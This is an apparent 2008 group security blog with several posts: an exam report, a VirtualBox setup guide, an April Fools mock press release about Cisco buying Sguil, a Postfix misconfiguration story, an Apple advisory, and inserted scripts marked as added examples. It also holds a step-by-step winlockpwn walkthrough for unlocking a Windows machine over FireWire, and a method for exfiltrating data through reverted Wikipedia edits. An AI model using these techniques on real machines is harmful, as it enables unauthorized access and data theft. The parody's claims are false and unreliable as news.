Saturday, April 19, 2008

Taking the GSSP-C Exam

On a sunny day in March, I strolled through the Begijnhof in Leuven, Belgium (pictures here). My destination was a nice medieval house where I would take the GSSP-C exam (GIAC Secure Software Programmer - C).

This exam is not your usual SANS exam: it's a proctored paper exam containing 100 multiple-choice questions, with a six-hour time limit. Unlike other GIAC certifications, this exam is not offered online and is not open book. The GSSP certification exam is only offered at specific locations on a number of dates through the year. This time, SANS teamed up with secappdev to organize this exam in Belgium (I believe it was the first time this exam was organized in Europe). The proctor was Pieter Danhieux (GSE).

You have to be fluent in C to attempt this exam (I believe I wrote my first C program in 1984), because a lot of the questions will be code listings where you have to identify errors. The SANS C-handbook has sample questions that give a good idea what to expect. And if you just learned to program in C, you might be able to answer many questions, but I highly doubt you'll manage to provide enough correct answers in the allotted time limit.

Brush up your knowledge of the basic C I/O functions: what is their signature, how do they behave? Trust me, you'll need this during the exam (remember, this exam is not open book).

Read a couple of the recommended books, like Exploiting Software: How to Break Code and Writing Secure Code, Second Edition.

Be prepared for some really hard puzzles. I remember one question where I would have overlooked the error in the C program. It's only because I knew the program was faulty that I persevered and found the f*ing bug!

Another hurdle is the exam format. Tackling 100 questions in 6 hours and transcribing 100 answers correctly with a number 2 pencil on a form is not so trivial. I followed the same strategy I successfully applied during my CISSP exam. Here is my recipe:

I read the first question. If I don’t understand the question, or if I don’t like the question, or if I even don’t feel like answering the question right now, I just move on to the next question. However, even when I skip a question, if I’m certain that one or more of the answers are not correct, I cross them out (every time I say I write something down or make a mark, I do it on the question booklet, unless stated otherwise).

If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.
If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.

After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times, each cycle gives me more answers. After a couple of hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.
I decided to transcribe the answers after completing about 80% because:
1) I want to take the time to correctly transcribe the answers; I don’t want to make mistakes by rushing the job at the end of the 6 hour period allowed for the exam
2) I don’t want to start second-guessing my answers

After 30 minutes, I’ve transcribed all answered questions.

Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers; I feel confident because of all the other questions I answered. Since a wrong answer does not negatively impact your score, you’re better off answering all questions than leaving some unanswered. The main reason why I tackle the remaining questions like this is that I don't want to start second-guessing my answers to the questions I felt confident about. Trust me, if you spend too much time toiling over a question where you're clueless, you'll start to doubt everything.

Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.

It's the first certification exam I really enjoyed. I had fun reviewing all that C code; it's a bit like discovering vulnerabilities.

Six weeks later, I got my detailed score report from SANS. Did I pass? I'll leave you in suspense too, for a couple of seconds...

http://www.giac.org/certified_professionals/listing/gssp-c.php


Friday, April 11, 2008

Running Backtrack in VirtualBox

Seeing as I've just spent the morning trying to get all this up and running I thought I'd create an entry about how to get Backtrack running in VirtualBox.

For those who haven't heard of it, VirtualBox is an open source equivalent to vmware workstation. It does full snapshotting (unlike vmware server) and seems to have a very active support community.

The setup I wanted was for the virtual machine to have its own IP address and full network access. The default setup for VirtualBox is to have NAT-based networking, so I had to do a bit of work to get full "Host Interface" mode. Unlike vmware, VirtualBox doesn't do all the networking itself; you have to do the initial setup yourself. This is done by using tun/tap and bridging. The instructions here work on Arch but should be generic enough for any distro. The install guide has detailed instructions for debian/ubuntu, redhat and suse.

First you need to install uml_utilities and bridge-utils, in Arch:

pacman -S uml_utilities bridge-utils

You then create a bridge and add your main interface to it:

brctl addbr br0
ifconfig eth0 0.0.0.0
brctl addif br0 eth0
ifconfig br0 up

The IP address normally assigned to eth0 now needs to be assigned to br0, so either bring up your dhcp client or hardcode the IP using ifconfig. If you are using ifconfig remember to setup your default route. Also remember to kill any dhcp clients working for eth0.

Next is creating the tun/tap interface. First check if you have the tun module loaded:

lsmod|grep tun

and if not load it:

modprobe tun

The virtual machine is going to get its own interface, this can be named whatever you want, I call mine vbox0. To create it:

tunctl -t vbox0 -u robin

this then needs adding to the bridge:

brctl addif br0 vbox0

and, the bit I missed for a while, bringing up:

ifconfig vbox0 up

You also need to check that the device (/dev/net/tun) is accessible by the user who is going to use it. I did this by creating a new vboxusers group, adding myself to it then making sure that the group could read and write from the device:

groupadd vboxusers
usermod -a -G vboxusers robin
chgrp vboxusers /dev/net/tun
chmod g+rw /dev/net/tun

You should now have a working virtual interface.
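The steps above lose the host's own connectivity if the address and default route are not carried over from eth0 to br0 in the right order. The script below is an added example, not code from the original post: it captures the address and gateway from iproute2 `ip` output before the interface is flushed and emits the ordered command list (eth0, br0, vbox0 and the user name come from the post; the addresses in the constructed sample output are assumptions).

```python
"""Added example, not code from the original post: build the bridge + tap
setup described above while carrying eth0's address and default route over
to br0, the step that cuts the host off when done in the wrong order.
Assumes iproute2 `ip` output; eth0/br0/vbox0 and the user name come from the
post, the addresses in the sample output below are constructed."""
import re
import shlex
import subprocess
from typing import List, Optional

# Constructed sample output of `ip -4 addr show dev eth0` and `ip route`.
SAMPLE_ADDR_OUTPUT = """\
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
    inet 192.0.2.10/24 brd 192.0.2.255 scope global eth0
"""
SAMPLE_ROUTE_OUTPUT = """\
default via 192.0.2.1 dev eth0
192.0.2.0/24 dev eth0  proto kernel  scope link  src 192.0.2.10
"""

_INET_RE = re.compile(r"^\s*inet\s+(\S+/\d+)\s", re.MULTILINE)
_GW_RE = re.compile(r"^default via (\S+) dev (\S+)", re.MULTILINE)


def primary_address(ip_addr_output: str) -> Optional[str]:
    """First IPv4 'addr/prefix' on the interface, or None if it has none."""
    m = _INET_RE.search(ip_addr_output)
    return m.group(1) if m else None


def default_gateway(ip_route_output: str, iface: str) -> Optional[str]:
    """Default gateway currently reached through `iface`, or None."""
    for gw, dev in _GW_RE.findall(ip_route_output):
        if dev == iface:
            return gw
    return None


def bridge_plan(addr_output: str, route_output: str, iface: str = "eth0",
                bridge: str = "br0", tap: str = "vbox0",
                user: str = "robin") -> List[str]:
    """Ordered commands: capture address and route, flush the interface,
    build the bridge and tap, then restore address and route on the bridge."""
    addr = primary_address(addr_output)
    gw = default_gateway(route_output, iface)
    plan = [
        "modprobe tun",
        f"brctl addbr {bridge}",
        f"ip addr flush dev {iface}",      # the post's `ifconfig eth0 0.0.0.0`
        f"brctl addif {bridge} {iface}",
        f"ip link set {bridge} up",
        f"tunctl -t {tap} -u {user}",
        f"brctl addif {bridge} {tap}",
        f"ip link set {tap} up",           # the step the post says is easy to miss
    ]
    if addr:
        plan.append(f"ip addr add {addr} dev {bridge}")
    if gw:
        plan.append(f"ip route add default via {gw} dev {bridge}")
    return plan


def apply_plan(plan: List[str]) -> None:
    """Run the plan as root, stopping at the first command that fails."""
    for cmd in plan:
        subprocess.run(shlex.split(cmd), check=True)


if __name__ == "__main__":
    for cmd in bridge_plan(SAMPLE_ADDR_OUTPUT, SAMPLE_ROUTE_OUTPUT):
        print(cmd)
```

On a DHCP-configured host, drop the last two commands and start the DHCP client on br0 instead, as the post describes.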

VirtualBox has a fairly simple GUI for creating new machines so I won't talk through that in detail. Basically, click the create a new machine button, set the memory size and if you want to have a drive for the machine, set that up here as well.

Once you've set up the machine it will appear in the left hand list of available machines. Right click on it and choose Settings. Choose Network and change the "Attached to" option to "Host Interface". In the "Interface Name" section at the bottom enter vbox0 (or whatever you called it above).

Next go to the "cd/dvd-rom" section, choose "mount cd/dvd drive" and specify where your backtrack CD is, either ISO or physical location. Click OK and you're done.

Start the machine. It should boot as normal and, once up and running, should try to get an IP address through dhcp; if you haven't got dhcp you will need to set up the IP manually.

All of this information is available in the VirtualBox manual but I found that some of the scripts it referred to didn't exist or didn't work quite as expected. I also prefer to set this kind of thing up by hand, at least the first few times so that I really know what is going on, once I'm happy then I'll look at scripting it.

Any problems, questions or corrections, let me know.

Tuesday, April 1, 2008

Cisco Acquires Sguil!!

In many of my past writings I have mentioned using Sguil on my personal blog and have been an avid user of the solution. On that front, I would like to extend my congratulations to the core members of the team for their great success! It will be exciting to see it running on IOS!

Cisco Announces Agreement to Acquire Sguil™ Open Source Security Monitoring Project


Acquisition Furthers Cisco’s Vision for Integrated Security Products

SAN JOSE, Calif., and LONGMONT, Color., April 1st, 2008 – Cisco and the Sguil™ project today announced an agreement for Cisco to acquire the Sguil™ project, a leading Open Source network security solution. With hundreds of installations world-wide, Sguil™ is the de facto reference implementation for the Network Security Monitoring (NSM) model. Sguil™-based NSM will enable Cisco’s customer base to more efficiently collect and analyze security-related information as it traverses their enterprise networks. This acquisition will help Cisco to cement its reputation as a leader in the Open Source movement while at the same time furthering its long-held vision of integrating security into the network infrastructure.

Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.

To date, Sguil™ has been developed primarily in the Tcl scripting language, support for which is already present inside many of Cisco’s routers and switches. The new product, to be known as “Cisco Embedded Monitoring Solution (CEMS)”, will be made available first in Cisco’s carrier-grade products in 3Q08, with support being phased into the rest of the Cisco product line by 4Q09. Linksys-branded devices will follow thereafter, though the exact deployment schedule has yet to be announced.

“We’re extremely pleased to announce this deal,” said Cisco’s Chief Security Product Manager Cletus F. Simmons. “For some time, our customers have told us that our existing security monitoring products did not extend far enough into their network infrastructure layer. Not only was it sometimes difficult to intercept and monitor the traffic, but there were often political problems at the customer site with deploying our Intrusion Detection Systems, as management had heard several years ago that they were ‘dead’. Now, with Sguil™ integrated into all their network devices, they’ll have no choice!”

Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”

About Cisco Systems

Cisco, (NASDAQ: CSCO), is the worldwide leader in networking that transforms how people connect, communicate and collaborate. Information about Cisco can be found at http://www.cisco.com. For ongoing news, please go to http://newsroom.cisco.com.

About Sguil™

Sguil™ is the leading Network Security Monitoring (NSM) framework. It is built for network security analysts by network security analysts. Sguil’s main component is an intuitive GUI that provides access to a wide variety of security related information, including real-time IDS alerts, network session database and full packet captures. Sguil™ was written by Robert “Bamm” Visscher, who was apparently too cheap to buy a book on Java or C.

Again, congrats to the team... if you get a chance, please stop in at #snort-gui on freenode and say hi / congratulate the team.

Cheers,
enhanced

Monday, March 31, 2008

<!-- Hiding Inside Wikipedia -->

It seems that each time I attend Black Hat, I get some new steganography idea.

It's easy to hide data inside the Wikipedia pages. But before I explain how, understand that the general principle of what I will explain applies to most sites where users can edit content. They can all be used as a covert channel, but Wikipedia has become so common that it would have passed under my radar when performing a forensic investigation. But not anymore.

You can use the Wikipedia Sandbox to experiment while avoiding the wrath of the Wiki gods.

Select the edit this page tab to start editing the article:


wikipedia-0004.png

Prepare the data you want to store on Wikipedia by converting it to a base64 representation (you can ZIP and/or encrypt it before converting it to base64). Insert the base64 data as a hidden comment inside the page:

wikipedia-0005.png

Save your changes first, and then undo your changes via the history tab:


wikipedia-0006b.png

That's it! From now on, you can retrieve your data by comparing versions:


wikipedia-0008.png

wikipedia-0009.png

So how can you detect and prevent this? Disclosure: my analysis is based on observations of the HTTP traffic generated by a browser connecting to Wikipedia, and not by analyzing the MediaWiki software.

Normal Wikipedia requests (browsing the articles) are GET http requests to the wikipedia.org server. Editing a page is done with a POST http request:

wikipedia-0010.png

So to detect a user updating a Wikipedia page, look for POST requests to Wikipedia. But there are exceptions to this rule. First, previews also use a POST request:

wikipedia-0011.png

You'll have to look inside the posted form data to differentiate a save from a preview:

wikipedia-0012.png

Another exception is a user login:

wikipedia-0013.png

To differentiate these, use the action parameter. It's submit for article updates and submitlogin for a user login.

You can use these criteria (POST request, form data, action parameter) to block edits to the Wikipedia site via a filtering proxy. Of course, this detects and blocks all updates, not only updates to exfiltrate data.
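The detection criteria above (request method, the action parameter, the posted form data) can be applied to captured requests by a proxy or a forensic script. The code below is an added example, not part of Didier Stevens' post: it classifies constructed sample requests as browse, preview, save or login, and for saves it looks for a long base64 run hidden in an HTML comment of the submitted wikitext. The form field names wpSave, wpPreview and wpTextbox1 are MediaWiki's edit-form fields and are not named in the post.

```python
"""Added example, not part of Didier Stevens' post: classify captured HTTP
requests to Wikipedia as browse / preview / save / login using the criteria
above (method, action parameter, posted form data), and flag saves whose
wikitext hides a long base64 run inside an HTML comment. The form field names
wpSave, wpPreview and wpTextbox1 are MediaWiki's and are not named in the
post; all requests below are constructed samples."""
import base64
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, quote, urlsplit

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)
BASE64_RE = re.compile(r"^[A-Za-z0-9+/=\s]+$")
MIN_BLOB_LEN = 64  # shorter comments are ordinary editor notes (assumption)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify(raw: str) -> str:
    """'browse' for GETs; POSTs are split by the action parameter (submit vs
    submitlogin) and, for submit, by which button the form data carries."""
    method, path, _, body = parse_request(raw)
    if method == "GET":
        return "browse"
    if method != "POST":
        return "other"
    query = parse_qs(urlsplit(path).query)
    form = parse_qs(body)
    action = (query.get("action") or form.get("action") or [""])[0]
    if action == "submitlogin":
        return "login"
    if action == "submit":
        if "wpPreview" in form:
            return "preview"
        if "wpSave" in form:
            return "save"
    return "other"


def hidden_blobs(raw: str) -> List[bytes]:
    """Decoded base64 payloads found inside HTML comments of a saved edit."""
    if classify(raw) != "save":
        return []
    _, _, _, body = parse_request(raw)
    text = parse_qs(body).get("wpTextbox1", [""])[0]
    found = []
    for comment in COMMENT_RE.findall(text):
        payload = comment.strip()
        if len(payload) >= MIN_BLOB_LEN and BASE64_RE.match(payload):
            try:
                found.append(base64.b64decode("".join(payload.split()), validate=True))
            except ValueError:  # looked like base64 but did not decode
                continue
    return found


def _post(path: str, body: str) -> str:
    """Build a constructed form POST to en.wikipedia.org."""
    return (f"POST {path} HTTP/1.1\r\nHost: en.wikipedia.org\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n\r\n{body}")


# Constructed samples; the hidden payload is deliberately harmless text.
HIDDEN = b"constructed payload: " + b"A" * 60
SAMPLES = {
    "browse": "GET /wiki/Steganography HTTP/1.1\r\nHost: en.wikipedia.org\r\n\r\n",
    "preview": _post("/w/index.php?title=Wikipedia:Sandbox&action=submit",
                     "wpTextbox1=hello&wpPreview=Show+preview"),
    "save": _post("/w/index.php?title=Wikipedia:Sandbox&action=submit",
                  "wpTextbox1=" + quote("hello <!-- " + base64.b64encode(HIDDEN).decode() + " -->")
                  + "&wpSave=Save+page"),
    "login": _post("/w/index.php?title=Special:UserLogin&action=submitlogin&type=login",
                   "wpName=alice&wpPassword=hunter2"),
}

if __name__ == "__main__":
    for kind, raw in SAMPLES.items():
        print(kind, "->", classify(raw), hidden_blobs(raw))
```

As the post notes, this flags every save carrying a large comment, not only exfiltration; treat a hit as a prompt to diff the page history rather than as proof.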

Didier Stevens
https://DidierStevens.com

Wednesday, March 26, 2008

How To: winlockpwn

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire's direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don't forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it:

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untarred directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it won't work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3's include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded, to see which port number it is on, and to make sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.


There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO's office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

---
Danny Howerton
http://metacortexsecurity.com

Tuesday, March 25, 2008

FAIL: When software tries to be smrt, and sysadmins trust it.

I run servers for a living... lots of servers, for all sorts of people and customers and workloads. Nothing homogeneous or even enterprisey about most of it.

Probably a year ago, I noticed one of my client's webserver VPS instances was spewing mail like an open relay. Some quick checking indicated this wasn't the case, and it wasn't listed on any RBLs either, so I assumed that some random PHP script was easily pwn3d. Since the client didn't care about email at all (sigh, why'd you have me turn it on?!), I just shutdown postfix, saw all the SMTP traffic stop and left it to the client to figure out, since they didn't see fit to have me dig deeper into it, nor could I justify doing it in the absence of financing.

Fast-forward to last week, when said client needed mail turned on. I hesitated and explained why I was reluctant to do this. They assured me that everything had been updated and most of the PHP stuff is gone, aside from a bleeding-edge instance of Wordpress. Okay, that's legit.

I review the config, trash the mail-queue just in case, and fire up postfix.

Nothing (bad) happens instantly, I make note to check it in the morning.

Everything's okay for the rest of the week, 10msg/day, normal email traffic flow for this client.

Yesterday morning though, I notice 7412msg/hr being queued. Eeep.

Killing apache seems to have no effect on the flow.

Reviewing mailq shows it's all spam or backscatter. Sigh.
I fix the backscatter problem (shame on me), postfix reload, and then just to be sure, do 'postconf -n' - and everything looks okay there too.
I continue auditing things running on the machine and don't see anything out of the ordinary, and yet postfix continues happily to queue spam.
More rummaging turns up nothing other than postfix being the problem.

And then I found it.

[root@bukkit ~]# postconf | grep mynet
mynetworks = 66/8
mynetworks_style = subnet
...
[root@bukkit ~]#

Postfix made a mistake. An ugly one. So ugly, it allowed 1/256th of the IPv4 Internet to relay mail via this server, with impunity.

But it was a minor error, one all sysadmins have made in their careers...

It got the subnet mask wrong.


Now, I'm not 100% certain of why this happens, but thanks to the default subnet mask for Class-A networks, of which my allocation is part, it had a flashback to the 1980s and defaulted to a /8.

And since this parameter defaults to being derived at start-time, it doesn't show up in 'postconf -n', which only shows non-defaulted configuration parameters.

Lesson: Don't trust your software to auto-configure properly every time, and when you're auditing configurations - check everything, not just non-default settings.
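The lesson above can be turned into a check that reads the effective configuration rather than the non-default subset. The code below is an added example, not the post's own: it parses full `postconf` output, flags any public mynetworks range wider than an assumed threshold, and reproduces the classful /8 that the post suspects `mynetworks_style = subnet` derived for a 66.x.x.x address. The sample postconf output is constructed from the lines the post shows.

```python
"""Added example, not from the original post: audit the effective Postfix
configuration (full `postconf` output, not `postconf -n`) for a mynetworks
range too wide to be a trusted relay source, and reproduce the classful /8
that the post suspects `mynetworks_style = subnet` derived for a 66.x.x.x
address. The sample output below is constructed; the alert threshold is an
assumption."""
import ipaddress
from typing import Dict, List, Tuple

# Constructed: the lines the post shows, plus ordinary neighbours.
SAMPLE_POSTCONF = """\
mydestination = $myhostname, localhost.$mydomain, localhost
mynetworks = 66/8
mynetworks_style = subnet
relay_domains = $mydestination
"""

MAX_TRUSTED_HOSTS = 2 ** 16  # wider than a /16 of public space is suspicious


def classful_prefix(address: str) -> int:
    """Pre-CIDR default mask: /8 for class A, /16 for class B, /24 for class C."""
    first = int(address.split(".")[0])
    if first < 128:
        return 8
    if first < 192:
        return 16
    return 24


def classful_network(address: str) -> ipaddress.IPv4Network:
    """The subnet a 1980s-style derivation would trust for `address`."""
    return ipaddress.ip_network(f"{address}/{classful_prefix(address)}", strict=False)


def parse_mynetworks(value: str) -> List[ipaddress.IPv4Network]:
    """Accepts Postfix's '66/8', '66.0.0.0/8', '66.0.0.0/255.0.0.0' and bare
    host forms; IPv6 and other tokens are skipped."""
    nets = []
    for token in value.replace(",", " ").split():
        addr, _, mask = token.partition("/")
        octets = addr.split(".")
        if len(octets) > 4 or not all(o.isdigit() for o in octets):
            continue  # e.g. [::1]/128 or a negated entry
        addr = ".".join(octets + ["0"] * (4 - len(octets)))  # '66' -> '66.0.0.0'
        nets.append(ipaddress.ip_network(f"{addr}/{mask or 32}", strict=False))
    return nets


def parse_postconf(output: str) -> Dict[str, str]:
    """Turn 'key = value' lines into a dict."""
    params = {}
    for line in output.splitlines():
        key, sep, value = line.partition(" = ")
        if sep:
            params[key.strip()] = value.strip()
    return params


def audit(postconf_output: str) -> List[Tuple[str, int]]:
    """(network, address count) for every public mynetworks entry wider than
    MAX_TRUSTED_HOSTS. Loopback and RFC 1918 ranges are left alone."""
    findings = []
    for net in parse_mynetworks(parse_postconf(postconf_output).get("mynetworks", "")):
        if net.is_private or net.is_loopback:
            continue
        if net.num_addresses > MAX_TRUSTED_HOSTS:
            findings.append((str(net), net.num_addresses))
    return findings


if __name__ == "__main__":
    # On a live host: audit(subprocess.check_output(["postconf"], text=True))
    for net, count in audit(SAMPLE_POSTCONF):
        print(f"mynetworks trusts {net}: {count} addresses may relay")
```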

I've checked all the other machines I'm responsible for, and haven't seen this happening, so I'll be updating this postfix to a later version soon, but at least I've hardcoded mynetworks for now.

With apologies to the unintended victims, and the rest of the Internet, for making the spam problem worse - not better.

Mea Culpa.

Tuesday, March 18, 2008

Apple posts update 2008-002

Apple just posted Apple Security Update 2008-002. Here's the news, updates for both Leopard and Tiger:

  • Security Update 2008-002
AFP Client

CVE-ID: CVE-2008-0044

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted afp:// URL may lead to an application termination or arbitrary code execution

Description: Multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking.

AFP Server

CVE-ID: CVE-2008-0045

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Cross-realm authentication with AFP Server may be bypassed

Description: An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.

Apache

CVE-ID: CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 1.3.33 and 1.3.39

Description: Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org. For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update.

Apache

CVE-ID: CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 2.2.6

Description: Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting. Further information is available via the Apache web site at http://httpd.apache.org.

AppKit

CVE-ID: CVE-2008-0048

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSDocument API may lead to arbitrary code execution

Description: A stack buffer overflow exists in the NSDocument API's handling of file names. On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0049

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A mach port in NSApplication intended for inter-thread synchronization is unintentionally available for inter-process communication. By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0057

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to arbitrary code execution

Description: Multiple integer overflow vulnerabilities exist in the parser for a legacy serialization format. By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0997

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Querying a network printer may cause an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in AppKit's handling of PPD files. By enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later.

Application Firewall

CVE-ID: CVE-2008-0046

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: The German translation of the Application Firewall preference pane was misleading

Description: The "Set access for specific services and applications" radio button of the Application Firewall preference pane was translated into German as "Zugriff auf bestimmte Dienste und Programme festlegen", which is "Set access to specific services and applications". This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. This issue does not affect systems prior to Mac OS X v10.5.

CFNetwork

CVE-ID: CVE-2008-0050

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A malicious proxy server may spoof secure websites

Description: A malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2.

ClamAV

CVE-ID: CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in ClamAV 0.90.3

Description: Multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net.

ClamAV

CVE-ID: CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.4.11

Impact: Multiple vulnerabilities in ClamAV 0.88.5

Description: Multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net.

CoreFoundation

CVE-ID: CVE-2008-0051

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: An integer overflow exists in CoreFoundation's handling of time zone data. This may allow a local user to cause arbitrary code execution with system privileges. This update addresses the issue through improved bounds checking on time zone data files. This issue does not affect systems running Mac OS X v10.5 or later.

CoreServices

CVE-ID: CVE-2008-0052

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a website could cause files to be opened in AppleWorks

